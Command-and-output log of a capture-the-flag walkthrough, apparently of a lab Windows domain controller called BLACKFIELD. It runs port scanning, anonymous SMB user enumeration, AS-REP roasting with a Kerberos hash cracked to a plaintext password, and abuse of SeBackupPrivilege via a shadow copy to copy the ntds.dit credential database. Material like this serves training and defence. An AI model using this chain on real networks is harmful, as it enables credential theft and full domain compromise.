[~] The config file is expected to be at "/root/.rustscan.toml" [!] File limitis lower than default batch size. Consider upping with--ulimit. May cause harm to sensitive servers [!] Your file limitis very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open10.129.229.17:53 Open10.129.229.17:88 Open10.129.229.17:135 Open10.129.229.17:389 Open10.129.229.17:445 Open10.129.229.17:593 Open10.129.229.17:3268 Open10.129.229.17:5985 [~] Starting Script(s) [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-2201:33 +0000 Initiating Ping Scan at 01:33 Scanning 10.129.229.17 [4 ports] Completed Ping Scan at 01:33, 0.19s elapsed (1 total hosts) Initiating Parallel DNS resolution of1 host. at 01:33 Completed Parallel DNS resolution of1 host. at 01:33, 0.50s elapsed DNS resolution of1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 01:33 Scanning 10.129.229.17 [8 ports] Discovered open port 53/tcp on10.129.229.17 Discovered open port 445/tcp on10.129.229.17 Discovered open port 135/tcp on10.129.229.17 Discovered open port 593/tcp on10.129.229.17 Discovered open port 3268/tcp on10.129.229.17 Discovered open port 88/tcp on10.129.229.17 Discovered open port 5985/tcp on10.129.229.17 Discovered open port 389/tcp on10.129.229.17 Completed SYN Stealth Scan at 01:33, 0.25s elapsed (8 total ports) Nmap scan report for10.129.229.17 Host is up, received echo-reply ttl 127 (0.21s latency). Scanned at 2026-06-2201:33:03 UTC for1s
PORT STATE SERVICE REASON 53/tcp opendomain syn-ack ttl 127 88/tcp open kerberos-sec syn-ack ttl 127 135/tcp open msrpc syn-ack ttl 127 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 593/tcp open http-rpc-epmap syn-ack ttl 127 3268/tcp open globalcatLDAP syn-ack ttl 127 5985/tcp open wsman syn-ack ttl 127
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in1.02 seconds Raw packets sent: 12 (504B) | Rcvd: 9 (380B)
Sharename TypeComment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Defaultshare forensic Disk Forensic / Audit share. IPC$ IPC Remote IPC NETLOGON Disk Logon servershare profiles$ Disk SYSVOL Disk Logon servershare Reconnecting with SMB1 for workgroup listing. do_connect: Connectionto10.129.229.17 failed (Error NT_STATUS_IO_TIMEOUT) Unable toconnectwith SMB1 -- no workgroup available
┌──(root㉿kaada)-[/home/kali/Desktop] └─# smbclient -N //10.129.229.17/profiles$ Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jun 3 16:47:12 2020 .. D 0 Wed Jun 3 16:47:12 2020 AAlleni D 0 Wed Jun 3 16:47:11 2020 ABarteski D 0 Wed Jun 3 16:47:11 2020 ABekesz D 0 Wed Jun 3 16:47:11 2020 ABenzies D 0 Wed Jun 3 16:47:11 2020 ABiemiller D 0 Wed Jun 3 16:47:11 2020 AChampken D 0 Wed Jun 3 16:47:11 2020 ACheretei D 0 Wed Jun 3 16:47:11 2020 ACsonaki D 0 Wed Jun 3 16:47:11 2020 AHigchens D 0 Wed Jun 3 16:47:11 2020 AJaquemai D 0 Wed Jun 3 16:47:11 2020 AKlado D 0 Wed Jun 3 16:47:11 2020 AKoffenburger D 0 Wed Jun 3 16:47:11 2020 AKollolli D 0 Wed Jun 3 16:47:11 2020 AKruppe D 0 Wed Jun 3 16:47:11 2020 AKubale D 0 Wed Jun 3 16:47:11 2020 ALamerz D 0 Wed Jun 3 16:47:11 2020 AMaceldon D 0 Wed Jun 3 16:47:11 2020 AMasalunga D 0 Wed Jun 3 16:47:11 2020 ANavay D 0 Wed Jun 3 16:47:11 2020 ANesterova D 0 Wed Jun 3 16:47:11 2020 ANeusse D 0 Wed Jun 3 16:47:11 2020 AOkleshen D 0 Wed Jun 3 16:47:11 2020 APustulka D 0 Wed Jun 3 16:47:11 2020 ARotella D 0 Wed Jun 3 16:47:11 2020 ASanwardeker D 0 Wed Jun 3 16:47:11 2020 AShadaia D 0 Wed Jun 3 16:47:11 2020 ASischo D 0 Wed Jun 3 16:47:11 2020 ASpruce D 0 Wed Jun 3 16:47:11 2020 ATakach D 0 Wed Jun 3 16:47:11 2020 ATaueg D 0 Wed Jun 3 16:47:11 2020 ATwardowski D 0 Wed Jun 3 16:47:11 2020 audit2020 D 0 Wed Jun 3 16:47:11 2020 AWangenheim D 0 Wed Jun 3 16:47:11 2020 AWorsey D 0 Wed Jun 3 16:47:11 2020 AZigmunt D 0 Wed Jun 3 16:47:11 2020 BBakajza D 0 Wed Jun 3 16:47:11 2020 BBeloucif D 0 Wed Jun 3 16:47:11 2020 BCarmitcheal D 0 Wed Jun 3 16:47:11 2020 BConsultant D 0 Wed Jun 3 16:47:11 2020 BErdossy D 0 Wed Jun 3 16:47:11 2020 BGeminski D 0 Wed Jun 3 16:47:11 2020 BLostal D 0 Wed Jun 3 16:47:11 2020 BMannise D 0 Wed Jun 3 16:47:11 2020 BNovrotsky D 0 Wed Jun 3 16:47:11 2020 BRigiero D 0 Wed Jun 3 16:47:11 2020 BSamkoses D 0 Wed Jun 3 16:47:11 2020 BZandonella D 0 Wed Jun 3 16:47:11 2020 CAcherman D 0 Wed Jun 3 16:47:12 2020 CAkbari D 0 Wed Jun 3 16:47:12 2020 CAldhowaihi D 0 Wed Jun 3 16:47:12 2020 CArgyropolous D 0 Wed Jun 3 16:47:12 2020 CDufrasne D 0 Wed Jun 3 16:47:12 2020 CGronk D 0 Wed Jun 3 16:47:11 2020 Chiucarello D 0 Wed Jun 3 16:47:11 2020 Chiuccariello D 0 Wed Jun 3 16:47:12 2020 CHoytal D 0 Wed Jun 3 16:47:12 2020 CKijauskas D 0 Wed Jun 3 16:47:12 2020 CKolbo D 0 Wed Jun 3 16:47:12 2020 CMakutenas D 0 Wed Jun 3 16:47:12 2020 CMorcillo D 0 Wed Jun 3 16:47:11 2020 CSchandall D 0 Wed Jun 3 16:47:12 2020 CSelters D 0 Wed Jun 3 16:47:12 2020 CTolmie D 0 Wed Jun 3 16:47:12 2020 DCecere D 0 Wed Jun 3 16:47:12 2020 DChintalapalli D 0 Wed Jun 3 16:47:12 2020 DCwilich D 0 Wed Jun 3 16:47:12 2020 DGarbatiuc D 0 Wed Jun 3 16:47:12 2020 DKemesies D 0 Wed Jun 3 16:47:12 2020 DMatuka D 0 Wed Jun 3 16:47:12 2020 DMedeme D 0 Wed Jun 3 16:47:12 2020 DMeherek D 0 Wed Jun 3 16:47:12 2020 DMetych D 0 Wed Jun 3 16:47:12 2020 DPaskalev D 0 Wed Jun 3 16:47:12 2020 DPriporov D 0 Wed Jun 3 16:47:12 2020 DRusanovskaya D 0 Wed Jun 3 16:47:12 2020 DVellela D 0 Wed Jun 3 16:47:12 2020 DVogleson D 0 Wed Jun 3 16:47:12 2020 DZwinak D 0 Wed Jun 3 16:47:12 2020 EBoley D 0 Wed Jun 3 16:47:12 2020 EEulau D 0 Wed Jun 3 16:47:12 2020 EFeatherling D 0 Wed Jun 3 16:47:12 2020 EFrixione D 0 Wed Jun 3 16:47:12 2020 EJenorik D 0 Wed Jun 3 16:47:12 2020 EKmilanovic D 0 Wed Jun 3 16:47:12 2020 ElKatkowsky D 0 Wed Jun 3 16:47:12 2020 EmaCaratenuto D 0 Wed Jun 3 16:47:12 2020 EPalislamovic D 0 Wed Jun 3 16:47:12 2020 EPryar D 0 Wed Jun 3 16:47:12 2020 ESachhitello D 0 Wed Jun 3 16:47:12 2020 ESariotti D 0 Wed Jun 3 16:47:12 2020 ETurgano D 0 Wed Jun 3 16:47:12 2020 EWojtila D 0 Wed Jun 3 16:47:12 2020 FAlirezai D 0 Wed Jun 3 16:47:12 2020 FBaldwind D 0 Wed Jun 3 16:47:12 2020 FBroj D 0 Wed Jun 3 16:47:12 2020 FDeblaquire D 0 Wed Jun 3 16:47:12 2020 FDegeorgio D 0 Wed Jun 3 16:47:12 2020 FianLaginja D 0 Wed Jun 3 16:47:12 2020 FLasokowski D 0 Wed Jun 3 16:47:12 2020 FPflum D 0 Wed Jun 3 16:47:12 2020 FReffey D 0 Wed Jun 3 16:47:12 2020 GaBelithe D 0 Wed Jun 3 16:47:12 2020 Gareld D 0 Wed Jun 3 16:47:12 2020 GBatowski D 0 Wed Jun 3 16:47:12 2020 GForshalger D 0 Wed Jun 3 16:47:12 2020 GGomane D 0 Wed Jun 3 16:47:12 2020 GHisek D 0 Wed Jun 3 16:47:12 2020 GMaroufkhani D 0 Wed Jun 3 16:47:12 2020 GMerewether D 0 Wed Jun 3 16:47:12 2020 GQuinniey D 0 Wed Jun 3 16:47:12 2020 GRoswurm D 0 Wed Jun 3 16:47:12 2020 GWiegard D 0 Wed Jun 3 16:47:12 2020 HBlaziewske D 0 Wed Jun 3 16:47:12 2020 HColantino D 0 Wed Jun 3 16:47:12 2020 HConforto D 0 Wed Jun 3 16:47:12 2020 HCunnally D 0 Wed Jun 3 16:47:12 2020 HGougen D 0 Wed Jun 3 16:47:12 2020 HKostova D 0 Wed Jun 3 16:47:12 2020 IChristijr D 0 Wed Jun 3 16:47:12 2020 IKoledo D 0 Wed Jun 3 16:47:12 2020 IKotecky D 0 Wed Jun 3 16:47:12 2020 ISantosi D 0 Wed Jun 3 16:47:12 2020 JAngvall D 0 Wed Jun 3 16:47:12 2020 JBehmoiras D 0 Wed Jun 3 16:47:12 2020 JDanten D 0 Wed Jun 3 16:47:12 2020 JDjouka D 0 Wed Jun 3 16:47:12 2020 JKondziola D 0 Wed Jun 3 16:47:12 2020 JLeytushsenior D 0 Wed Jun 3 16:47:12 2020 JLuthner D 0 Wed Jun 3 16:47:12 2020 JMoorehendrickson D 0 Wed Jun 3 16:47:12 2020 JPistachio D 0 Wed Jun 3 16:47:12 2020 JScima D 0 Wed Jun 3 16:47:12 2020 JSebaali D 0 Wed Jun 3 16:47:12 2020 JShoenherr D 0 Wed Jun 3 16:47:12 2020 JShuselvt D 0 Wed Jun 3 16:47:12 2020 KAmavisca D 0 Wed Jun 3 16:47:12 2020 KAtolikian D 0 Wed Jun 3 16:47:12 2020 KBrokinn D 0 Wed Jun 3 16:47:12 2020 KCockeril D 0 Wed Jun 3 16:47:12 2020 KColtart D 0 Wed Jun 3 16:47:12 2020 KCyster D 0 Wed Jun 3 16:47:12 2020 KDorney D 0 Wed Jun 3 16:47:12 2020 KKoesno D 0 Wed Jun 3 16:47:12 2020 KLangfur D 0 Wed Jun 3 16:47:12 2020 KMahalik D 0 Wed Jun 3 16:47:12 2020 KMasloch D 0 Wed Jun 3 16:47:12 2020 KMibach D 0 Wed Jun 3 16:47:12 2020 KParvankova D 0 Wed Jun 3 16:47:12 2020 KPregnolato D 0 Wed Jun 3 16:47:12 2020 KRasmor D 0 Wed Jun 3 16:47:12 2020 KShievitz D 0 Wed Jun 3 16:47:12 2020 KSojdelius D 0 Wed Jun 3 16:47:12 2020 KTambourgi D 0 Wed Jun 3 16:47:12 2020 KVlahopoulos D 0 Wed Jun 3 16:47:12 2020 KZyballa D 0 Wed Jun 3 16:47:12 2020 LBajewsky D 0 Wed Jun 3 16:47:12 2020 LBaligand D 0 Wed Jun 3 16:47:12 2020 LBarhamand D 0 Wed Jun 3 16:47:12 2020 LBirer D 0 Wed Jun 3 16:47:12 2020 LBobelis D 0 Wed Jun 3 16:47:12 2020 LChippel D 0 Wed Jun 3 16:47:12 2020 LChoffin D 0 Wed Jun 3 16:47:12 2020 LCominelli D 0 Wed Jun 3 16:47:12 2020 LDruge D 0 Wed Jun 3 16:47:12 2020 LEzepek D 0 Wed Jun 3 16:47:12 2020 LHyungkim D 0 Wed Jun 3 16:47:12 2020 LKarabag D 0 Wed Jun 3 16:47:12 2020 LKirousis D 0 Wed Jun 3 16:47:12 2020 LKnade D 0 Wed Jun 3 16:47:12 2020 LKrioua D 0 Wed Jun 3 16:47:12 2020 LLefebvre D 0 Wed Jun 3 16:47:12 2020 LLoeradeavilez D 0 Wed Jun 3 16:47:12 2020 LMichoud D 0 Wed Jun 3 16:47:12 2020 LTindall D 0 Wed Jun 3 16:47:12 2020 LYturbe D 0 Wed Jun 3 16:47:12 2020 MArcynski D 0 Wed Jun 3 16:47:12 2020 MAthilakshmi D 0 Wed Jun 3 16:47:12 2020 MAttravanam D 0 Wed Jun 3 16:47:12 2020 MBrambini D 0 Wed Jun 3 16:47:12 2020 MHatziantoniou D 0 Wed Jun 3 16:47:12 2020 MHoerauf D 0 Wed Jun 3 16:47:12 2020 MKermarrec D 0 Wed Jun 3 16:47:12 2020 MKillberg D 0 Wed Jun 3 16:47:12 2020 MLapesh D 0 Wed Jun 3 16:47:12 2020 MMakhsous D 0 Wed Jun 3 16:47:12 2020 MMerezio D 0 Wed Jun 3 16:47:12 2020 MNaciri D 0 Wed Jun 3 16:47:12 2020 MShanmugarajah D 0 Wed Jun 3 16:47:12 2020 MSichkar D 0 Wed Jun 3 16:47:12 2020 MTemko D 0 Wed Jun 3 16:47:12 2020 MTipirneni D 0 Wed Jun 3 16:47:12 2020 MTonuri D 0 Wed Jun 3 16:47:12 2020 MVanarsdel D 0 Wed Jun 3 16:47:12 2020 NBellibas D 0 Wed Jun 3 16:47:12 2020 NDikoka D 0 Wed Jun 3 16:47:12 2020 NGenevro D 0 Wed Jun 3 16:47:12 2020 NGoddanti D 0 Wed Jun 3 16:47:12 2020 NMrdirk D 0 Wed Jun 3 16:47:12 2020 NPulido D 0 Wed Jun 3 16:47:12 2020 NRonges D 0 Wed Jun 3 16:47:12 2020 NSchepkie D 0 Wed Jun 3 16:47:12 2020 NVanpraet D 0 Wed Jun 3 16:47:12 2020 OBelghazi D 0 Wed Jun 3 16:47:12 2020 OBushey D 0 Wed Jun 3 16:47:12 2020 OHardybala D 0 Wed Jun 3 16:47:12 2020 OLunas D 0 Wed Jun 3 16:47:12 2020 ORbabka D 0 Wed Jun 3 16:47:12 2020 PBourrat D 0 Wed Jun 3 16:47:12 2020 PBozzelle D 0 Wed Jun 3 16:47:12 2020 PBranti D 0 Wed Jun 3 16:47:12 2020 PCapperella D 0 Wed Jun 3 16:47:12 2020 PCurtz D 0 Wed Jun 3 16:47:12 2020 PDoreste D 0 Wed Jun 3 16:47:12 2020 PGegnas D 0 Wed Jun 3 16:47:12 2020 PMasulla D 0 Wed Jun 3 16:47:12 2020 PMendlinger D 0 Wed Jun 3 16:47:12 2020 PParakat D 0 Wed Jun 3 16:47:12 2020 PProvencer D 0 Wed Jun 3 16:47:12 2020 PTesik D 0 Wed Jun 3 16:47:12 2020 PVinkovich D 0 Wed Jun 3 16:47:12 2020 PVirding D 0 Wed Jun 3 16:47:12 2020 PWeinkaus D 0 Wed Jun 3 16:47:12 2020 RBaliukonis D 0 Wed Jun 3 16:47:12 2020 RBochare D 0 Wed Jun 3 16:47:12 2020 RKrnjaic D 0 Wed Jun 3 16:47:12 2020 RNemnich D 0 Wed Jun 3 16:47:12 2020 RPoretsky D 0 Wed Jun 3 16:47:12 2020 RStuehringer D 0 Wed Jun 3 16:47:12 2020 RSzewczuga D 0 Wed Jun 3 16:47:12 2020 RVallandas D 0 Wed Jun 3 16:47:12 2020 RWeatherl D 0 Wed Jun 3 16:47:12 2020 RWissor D 0 Wed Jun 3 16:47:12 2020 SAbdulagatov D 0 Wed Jun 3 16:47:12 2020 SAjowi D 0 Wed Jun 3 16:47:12 2020 SAlguwaihes D 0 Wed Jun 3 16:47:12 2020 SBonaparte D 0 Wed Jun 3 16:47:12 2020 SBouzane D 0 Wed Jun 3 16:47:12 2020 SChatin D 0 Wed Jun 3 16:47:12 2020 SDellabitta D 0 Wed Jun 3 16:47:12 2020 SDhodapkar D 0 Wed Jun 3 16:47:12 2020 SEulert D 0 Wed Jun 3 16:47:12 2020 SFadrigalan D 0 Wed Jun 3 16:47:12 2020 SGolds D 0 Wed Jun 3 16:47:12 2020 SGrifasi D 0 Wed Jun 3 16:47:12 2020 SGtlinas D 0 Wed Jun 3 16:47:12 2020 SHauht D 0 Wed Jun 3 16:47:12 2020 SHederian D 0 Wed Jun 3 16:47:12 2020 SHelregel D 0 Wed Jun 3 16:47:12 2020 SKrulig D 0 Wed Jun 3 16:47:12 2020 SLewrie D 0 Wed Jun 3 16:47:12 2020 SMaskil D 0 Wed Jun 3 16:47:12 2020 Smocker D 0 Wed Jun 3 16:47:12 2020 SMoyta D 0 Wed Jun 3 16:47:12 2020 SRaustiala D 0 Wed Jun 3 16:47:12 2020 SReppond D 0 Wed Jun 3 16:47:12 2020 SSicliano D 0 Wed Jun 3 16:47:12 2020 SSilex D 0 Wed Jun 3 16:47:12 2020 SSolsbak D 0 Wed Jun 3 16:47:12 2020 STousignaut D 0 Wed Jun 3 16:47:12 2020 support D 0 Wed Jun 3 16:47:12 2020 svc_backup D 0 Wed Jun 3 16:47:12 2020 SWhyte D 0 Wed Jun 3 16:47:12 2020 SWynigear D 0 Wed Jun 3 16:47:12 2020 TAwaysheh D 0 Wed Jun 3 16:47:12 2020 TBadenbach D 0 Wed Jun 3 16:47:12 2020 TCaffo D 0 Wed Jun 3 16:47:12 2020 TCassalom D 0 Wed Jun 3 16:47:12 2020 TEiselt D 0 Wed Jun 3 16:47:12 2020 TFerencdo D 0 Wed Jun 3 16:47:12 2020 TGaleazza D 0 Wed Jun 3 16:47:12 2020 TKauten D 0 Wed Jun 3 16:47:12 2020 TKnupke D 0 Wed Jun 3 16:47:12 2020 TLintlop D 0 Wed Jun 3 16:47:12 2020 TMusselli D 0 Wed Jun 3 16:47:12 2020 TOust D 0 Wed Jun 3 16:47:12 2020 TSlupka D 0 Wed Jun 3 16:47:12 2020 TStausland D 0 Wed Jun 3 16:47:12 2020 TZumpella D 0 Wed Jun 3 16:47:12 2020 UCrofskey D 0 Wed Jun 3 16:47:12 2020 UMarylebone D 0 Wed Jun 3 16:47:12 2020 UPyrke D 0 Wed Jun 3 16:47:12 2020 VBublavy D 0 Wed Jun 3 16:47:12 2020 VButziger D 0 Wed Jun 3 16:47:12 2020 VFuscca D 0 Wed Jun 3 16:47:12 2020 VLitschauer D 0 Wed Jun 3 16:47:12 2020 VMamchuk D 0 Wed Jun 3 16:47:12 2020 VMarija D 0 Wed Jun 3 16:47:12 2020 VOlaosun D 0 Wed Jun 3 16:47:12 2020 VPapalouca D 0 Wed Jun 3 16:47:12 2020 WSaldat D 0 Wed Jun 3 16:47:12 2020 WVerzhbytska D 0 Wed Jun 3 16:47:12 2020 WZelazny D 0 Wed Jun 3 16:47:12 2020 XBemelen D 0 Wed Jun 3 16:47:12 2020 XDadant D 0 Wed Jun 3 16:47:12 2020 XDebes D 0 Wed Jun 3 16:47:12 2020 XKonegni D 0 Wed Jun 3 16:47:12 2020 XRykiel D 0 Wed Jun 3 16:47:12 2020 YBleasdale D 0 Wed Jun 3 16:47:12 2020 YHuftalin D 0 Wed Jun 3 16:47:12 2020 YKivlen D 0 Wed Jun 3 16:47:12 2020 YKozlicki D 0 Wed Jun 3 16:47:12 2020 YNyirenda D 0 Wed Jun 3 16:47:12 2020 YPredestin D 0 Wed Jun 3 16:47:12 2020 YSeturino D 0 Wed Jun 3 16:47:12 2020 YSkoropada D 0 Wed Jun 3 16:47:12 2020 YVonebers D 0 Wed Jun 3 16:47:12 2020 YZarpentine D 0 Wed Jun 3 16:47:12 2020 ZAlatti D 0 Wed Jun 3 16:47:12 2020 ZKrenselewski D 0 Wed Jun 3 16:47:12 2020 ZMalaab D 0 Wed Jun 3 16:47:12 2020 ZMiick D 0 Wed Jun 3 16:47:12 2020 ZScozzari D 0 Wed Jun 3 16:47:12 2020 ZTimofeeff D 0 Wed Jun 3 16:47:12 2020 ZWausik D 0 Wed Jun 3 16:47:12 2020
5102079 blocks of size 4096. 1691376 blocks available
┌──(root㉿kaada)-[/home/kali/Desktop] └─# impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 10.129.229.17 BLACKFIELD.local/ Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$support@BLACKFIELD.LOCAL:04643310da06a76f4ddc689721e9626d$4746c7eba7e64fc814a81f4ad22fc66a9374cb8dcb7a30e79401ea36e1fe9b2b61fbeeb078ce2fcfc6e47b986f96cadeb72351eab684cb1e87d11025c106ad519442f817d0e34170e352eef68c79293cdd998554ec01afcbd6910712a079028e5865268f6c39531730d8b175fb76b82cec13398078dba823d320992241a768e60329e4fd710882032ba747a8c1f0db04103a0f9c343fc6c2a34354feb8e601f3050035c5b4748cff59abba4ff615b5b19f6c0670e72565a3f2ff680e98667f0660d518a75fcf07e60466a85892fcbb469bb20edec2fa9114febefb6aaefc08cd33f811f063e77ea8d5d66baa045f05113186e3ec [-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
john破解哈希
1 2 3 4 5 6 7 8 9 10 11
┌──(root㉿kaada)-[/home/kali/Desktop] └─# john hash.txt --wordlist=rockyou.txt Usingdefaultinputencoding: UTF-8 Loaded 1password hash (krb5asrep, Kerberos 5AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q'or Ctrl-C toabort, almost any other key for status #00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL) 1g 0:00:00:10 DONE (2026-06-2201:59) 0.09784g/s 1402Kp/s 1402Kc/s 1402KC/s #1WIF3Y..#*burberry#*1990 Use the "--show" optionto display allof the cracked passwords reliably Session completed.
┌──(root㉿kaada)-[/home/kali/Desktop] └─# smbclient -U audit2020 //10.129.229.17/forensic Password for [WORKGROUP\audit2020]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sun Feb 23 13:03:16 2020 .. D 0 Sun Feb 23 13:03:16 2020 commands_output D 0 Sun Feb 23 18:14:37 2020 memory_analysis D 0 Thu May 28 20:28:33 2020 tools D 0 Sun Feb 23 13:39:08 2020
5102079 blocks of size 4096. 1691631 blocks available smb: \>
smb: \> cd memory_analysis\ smb: \memory_analysis\> dir . D 0 Thu May 28 20:28:332020 .. D 0 Thu May 28 20:28:332020 conhost.zip A37876530 Thu May 28 20:25:362020 ctfmon.zip A24962333 Thu May 28 20:25:452020 dfsrs.zip A23993305 Thu May 28 20:25:542020 dllhost.zip A18366396 Thu May 28 20:26:042020 ismserv.zip A8810157 Thu May 28 20:26:132020 lsass.zip A41936098 Thu May 28 20:25:082020 mmc.zip A64288607 Thu May 28 20:25:252020 RuntimeBroker.zip A13332174 Thu May 28 20:26:242020 ServerManager.zip A131983313 Thu May 28 20:26:492020 sihost.zip A33141744 Thu May 28 20:27:002020 smartscreen.zip A33756344 Thu May 28 20:27:112020 svchost.zip A14408833 Thu May 28 20:27:192020 taskhostw.zip A34631412 Thu May 28 20:27:302020 winlogon.zip A14255089 Thu May 28 20:27:382020 wlms.zip A4067425 Thu May 28 20:27:442020 WmiPrvSE.zip A18303252 Thu May 28 20:27:532020
5102079 blocks of size 4096. 1691631 blocks available smb: \memory_analysis\> get lsass.zip parallel_read returned NT_STATUS_IO_TIMEOUT smb: \memory_analysis\>
GroupNameType SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known groupS-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known groupS-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known groupS-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known groupS-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known groupS-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USERCLAIMSINFORMATION -----------------------
Userclaims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled. *Evil-WinRM* PS C:\Users\svc_backup\Documents>
------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows -------------------------------------------------------------------------------
Started : Monday, June 22, 20263:51:32 AM Source : C:\Windows\NTDS\ Dest : C:\Users\svc_backup\Documents\temp\
1 C:\Windows\NTDS\ NewFile18.0 m ntds.dit 2026/06/2203:51:32ERROR32 (0x00000020) Copying File C:\Windows\NTDS\ntds.dit The process cannot access the file because it is being used by another process.
-> set context persistent nowriters -> add volume c: alias temp -> create Alias temp for shadow ID {d9297eac-45d1-4ff5-9f89-55b241392c02} setas environment variable. Alias VSS_SHADOW_SET for shadow set ID {1c928807-c8cf-4d93-a029-ad88f5f6fb64} setas environment variable.
Querying all shadow copies with the shadow copyset ID {1c928807-c8cf-4d93-a029-ad88f5f6fb64}
* Shadow copy ID = {d9297eac-45d1-4ff5-9f89-55b241392c02} %temp% - Shadow copyset: {1c928807-c8cf-4d93-a029-ad88f5f6fb64} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\] - Creation time: 6/22/20263:53:54 AM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1 -> expose %temp% z: -> %temp% = {d9297eac-45d1-4ff5-9f89-55b241392c02} The shadow copy was successfully exposed asz:\. ->
验证挂载
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
*Evil-WinRM* PS C:\temp> ls z:\
Directory: z:\
Mode LastWriteTime Length Name --------------------------- d----- 5/26/2020 5:38 PM PerfLogs d----- 6/3/2020 9:47 AM profiles d-r--- 3/19/2020 11:08 AM Program Files d----- 2/1/2020 11:05 AM Program Files (x86) d----- 6/22/2026 3:53 AM temp d-r--- 2/23/2020 9:16 AM Users d----- 9/21/2020 4:29 PM Windows -a---- 2/28/2020 4:36 PM 447 notes.txt
------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows -------------------------------------------------------------------------------
Started : Monday, June 22, 2026 3:54:52 AM Source : Z:\Windows\NTDS\ Dest : C:\temp\